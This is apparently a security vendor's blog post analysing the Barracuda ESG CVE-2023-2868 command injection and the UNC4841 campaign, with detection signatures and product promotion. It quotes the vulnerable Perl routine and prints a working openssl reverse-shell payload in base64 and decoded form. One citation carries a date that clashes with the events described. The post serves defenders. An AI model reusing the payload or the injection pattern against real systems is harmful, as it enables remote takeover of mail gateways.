On July 28th, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released a security alert on a critical remote command injection vulnerability found in Barracuda Email Security Gateway (ESG) [1]. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical) and has been exploited by the Chinese cyber threat group UNC4841 since October 2022.
In this blog, we explain how the Barracuda CVE-2023-2868 exploit works and which malware UNC4841 uses.
What Is the Barracuda CVE-2023-2868 Command Injection Vulnerability?
Barracuda Email Security Gateway (ESG) is a security solution that inspects inbound and outbound email traffic for email-borne threats and data leaks. In May 2023, Barracuda disclosed that it had found and patched a critical remote command injection vulnerability in Barracuda ESG. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical), and the earliest evidence shows that it has been exploited since October 2022. Barracuda estimates that 5% of its 11000 devices worldwide are impacted.
Barracuda ESG versions from 5.1.3.001 to 9.2.0.006 are impacted. For mitigation, Barracuda urges users to isolate and replace impacted Barracuda ESG products, regardless of patch level, and recommends rotating any credentials connected to the ESG appliance. To replace hardware versions of Barracuda ESG, Barracuda issued RMA guidance.
How Does the Barracuda ESG CVE-2023-2868 Exploit Work?
CVE-2023-2868 is a command injection vulnerability that adversaries can abuse to execute arbitrary commands remotely. The root cause is a flaw in the parsing logic that processes TAR files. Barracuda ESG uses the following Perl routine, which runs the tarexec command through the system shell via qx{}. Because Barracuda ESG does not sanitize the user-controlled "$f" variable before interpolating it into the shell command line, adversaries were able to craft TAR files whose member names break out of the quoted argument and execute system commands with the ESG's privileges [2].
qx{$tarexec -O -xf $tempdir/parts/$part '$f'};
Example 1: Vulnerable Perl routine in Barracuda ESG
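As an added defender-side example (not code from the original post, from Barracuda, or from Picus), the following Python check walks raw TAR headers and flags member names containing characters that could escape the single-quoted '$f' argument in the routine above; the sample archive is constructed inline, and the metacharacter set is an assumption for illustration.

```python
import io
import re
import tarfile

# Characters that would let a member name escape the single-quoted '$f'
# argument in the vulnerable qx{...} call, or that the shell would interpret.
# This set is an assumption for the example, not Barracuda's or Picus's logic.
SHELL_META = re.compile(r"[`'\"$;|&<>(){}\\\n]")
BLOCK = 512


def member_names(data: bytes):
    """Walk raw ustar/GNU TAR headers and yield each member name.

    Headers are parsed directly instead of through a high-level reader so that
    names a library might normalize or reject are still inspected.
    """
    off, pending = 0, None
    while off + BLOCK <= len(data):
        hdr = data[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:  # end-of-archive marker
            break
        size = int(hdr[124:136].split(b"\0", 1)[0].strip() or b"0", 8)
        body_end = off + BLOCK + ((size + BLOCK - 1) // BLOCK) * BLOCK
        if hdr[156:157] == b"L":  # GNU long name: the real name is in the data block
            pending = data[off + BLOCK:off + BLOCK + size].rstrip(b"\0")
        else:
            name = hdr[0:100].split(b"\0", 1)[0]
            prefix = hdr[345:500].split(b"\0", 1)[0]
            if hdr[257:263] == b"ustar\0" and prefix:  # POSIX ustar prefix field
                name = prefix + b"/" + name
            yield (pending or name).decode("utf-8", "replace")
            pending = None
        off = body_end


def suspicious_members(data: bytes) -> list:
    """Return the member names that contain shell metacharacters."""
    return [n for n in member_names(data) if SHELL_META.search(n)]


def build_sample() -> bytes:
    """Constructed sample archive for this example (not from the original page)."""
    buf = io.BytesIO()
    # The last name exceeds 100 bytes, so tar stores it in a GNU long-name header.
    names = ["report.pdf", "notes'.txt", "q" * 110 + "`.bin"]
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.GNU_FORMAT) as tar:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = 5
            tar.addfile(info, io.BytesIO(b"hello"))
    return buf.getvalue()
```

Running `suspicious_members(build_sample())` reports the two names with a quote or backtick, including the one hidden in the long-name header.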
Initially, Barracuda released a patch to address the vulnerability on May 23rd, 2023. However, adversaries were able to circumvent the patch and continued to exploit the CVE-2023-2868 vulnerability. On May 31st, 2023, Barracuda advised their customers to isolate and replace impacted ESG products, regardless of patch level.
Chinese APT Group UNC4841
UNC4841 is a cyber espionage group, and their campaigns are mostly conducted in support of the Chinese government. Nearly half of the target organizations are located in the Americas, and a third of them are governmental organizations. Individuals working for a government or a research institute are also targeted as they are likely to be privy to political or strategic information.
As an initial access vector, UNC4841 sends emails with malicious files crafted to exploit the CVE-2023-2868 vulnerability to victim organizations. The file extension of the malicious file can be TAR, JPG, or DAT. After the mail is delivered, the crafted malicious file exploits the CVE-2023-2868 vulnerability and executes a reverse shell payload.
Obfuscated payload: c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjE0OS4xNTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=
Deobfuscated payload: setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect <UNC4841_C2_Server> >/tmp/p 2>/dev/null;rm /tmp/p"
Example 2: Reverse shell payload used by UNC4841
How Does Picus Help Simulate Barracuda ESG CVE-2023-2868 RCE Attacks?
We strongly suggest simulating Barracuda ESG CVE-2023-2868 exploitation attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus The Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, ProxyNotShell, and Follina, within minutes with a 14-day free trial of the Picus Platform.
The Picus Threat Library includes the following threats for Barracuda ESG CVE-2023-2868 vulnerability exploitation attacks:
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 74165 | WHIRLPOOL Backdoor Malware Download Threat | Network Infiltration |
| 34162 | WHIRLPOOL Backdoor Malware Email Threat | Email Infiltration |
| 47061 | SEASPY Backdoor Malware Download Threat | Network Infiltration |
| 74675 | SEASPY Backdoor Malware Email Threat | Email Infiltration |
| 26107 | Barracuda CVE-2023-2868 Remote Command Injection Vulnerability Download Threat | Network Infiltration |
| 51027 | Barracuda CVE-2023-2868 Remote Command Injection Vulnerability Email Threat | Email Infiltration (Phishing) |
Moreover, the Picus Threat Library contains 300+ threats covering 3000+ web application and vulnerability exploitation attacks, in addition to 1500+ endpoint, 8000+ malware, email, and data exfiltration threats as of today.
Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures that address CVE-2023-2868 vulnerability exploitation attacks and related malware attacks in preventive security controls. Picus Labs has currently validated the following signatures for CVE-2023-2868 vulnerability exploitation attacks:
| Security Control | Signature ID | Signature Name |
|---|---|---|
| Check Point NGFW | 0BB29FE1D | Backdoor.Linux.Barracuda.TC.ac43pCBn |
| Check Point NGFW | 0C688486B | Backdoor.Linux.Barracuda.TC.cc22culd |
| Check Point NGFW | 0A44B817D | Backdoor.Linux.Barracuda.TC.1089EgCP |
| Cisco FirePower | 1.61918.2 | SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt |
| Forcepoint NGFW | | File_Malware-Blocked |
| Fortigate AV | 10142373 | Linux/Barr.CUDA!tr |
| Snort | 1.61918.2 | SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt |
| Snort | 1.61920.2 | SERVER-WEBAPP Barracuda Email Security Gateway malicious .tar upload attempt |
| Tippingpoint | 42865 | TCP: Barracuda Email Security Gateway Command Injection Vulnerability |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of Picus The Complete Security Validation Platform.
References
[1] "CISA Releases Malware Analysis Reports on Barracuda Backdoors," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors. [Accessed: Jul. 31, 2023]
[2] "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China," Mandiant, Oct. 03, 2021. Available: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally. [Accessed: Jul. 31, 2023]